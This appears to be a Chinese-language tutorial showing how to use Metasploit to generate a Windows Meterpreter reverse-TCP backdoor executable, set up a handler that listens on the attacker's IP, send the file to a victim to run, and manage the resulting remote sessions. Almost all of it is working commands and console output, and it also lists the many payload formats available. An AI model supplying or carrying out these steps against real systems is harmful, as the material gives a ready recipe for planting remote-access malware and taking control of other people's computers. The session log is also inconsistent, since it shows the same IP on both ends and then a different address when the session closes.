一、后门生成

1.1  调用payload

msf > use payload/windows/meterpreter/reverse_tcp

1.2 使用show option 命令查看需要配置选项:

msf payload(reverse_tcp) > show options 

Module options (payload/windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description

   ----      ---------------  --------  -----------

   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)

   LHOST                      yes       The listen address

   LPORT     4444             yes       The listen port

1.3 配置payload选项(此地的LHOST为***者的IP地址)

msf payload(reverse_tcp) > set LHOST 172.16.0.102

LHOST => 172.16.0.102

msf payload(reverse_tcp) > show options 

Module options (payload/windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description

   ----      ---------------  --------  -----------

   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)

   LHOST     172.16.0.102     yes       The listen address

   LPORT     4444             yes       The listen port

1.4 生成后门文件(-t 后制定后门文件的类型,本例为exe -f 制定文件路径和文件名)

msf payload(reverse_tcp) > generate -t exe -f /Users/jiangzhehao/Downloads/4.exe

[*] Writing 73802 bytes to /Users/jiangzhehao/Downloads/4.exe...

二、配置漏洞利用端

2.1 配置exploit/multi/handler作为利用端

msf > use exploit/multi/handler

2.2 选择前边生成后门对应的payload

msf exploit(handler) > set payload windows/meterpreter/reverse_tcp

payload => windows/meterpreter/reverse_tcp

2.3 配置选项中需要的监听地址和端口

msf exploit(handler) > show options 

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description

   ----  ---------------  --------  -----------

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description

   ----      ---------------  --------  -----------

   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)

   LHOST                      yes       The listen address

   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name

   --  ----

   0   Wildcard Target

msf exploit(handler) > set LHOST 172.16.0.102

LHOST => 172.16.0.102

2.4 配置完成后使用exploit命令开始监听

msf exploit(handler) > exploit 

[*] Started reverse TCP handler on 172.16.0.102:4444 

[*] Starting the payload handler...

三、将生成的后门发送给客户端执行

四、在监听下的命令行等待客户端上线,上线后会出现如下提示:

[*] Sending stage (957999 bytes) to 172.16.0.102

[*] Meterpreter session 1 opened (172.16.0.102:4444 -> 172.16.0.102:53175) at 2016-05-08 20:12:37 +0800

meterpreter > exit

[*] Shutting down Meterpreter...

[*] 192.168.231.128 - Meterpreter session 1 closed.  Reason: User exit

msf exploit(handler)

(一旦服务端退出,客户端也会随即退出)

附:

1、生成的后门可以支持多种格式,具体如下:

bash,c,csharp,dw,dword,hex,java,js_be,js_le,num,perl,pl,powershell,ps1,py,python,raw,rb,ruby,sh,vbapplication,vbscript,asp,aspx,aspx-exe,dll,elf,elf-so,exe,exe-only,exe-service,exe-small,hta-psh,loop-vbs,macho,msi,msi-nouac,osx-app,psh,psh-net,psh-reflection,psh-cmd,vba,vba-exe,vba-psh,vbs,war

2、返回的连接可以使用background 将当前连接切换到后台运行;

3、切换到后台的会话可以使用session -i查看到,然后使用session -i id 将后台的会话切换回前台;

4、切换到后台的会话可以使用session -i查看到,还可以使用session -k id 将后台指定会话中断;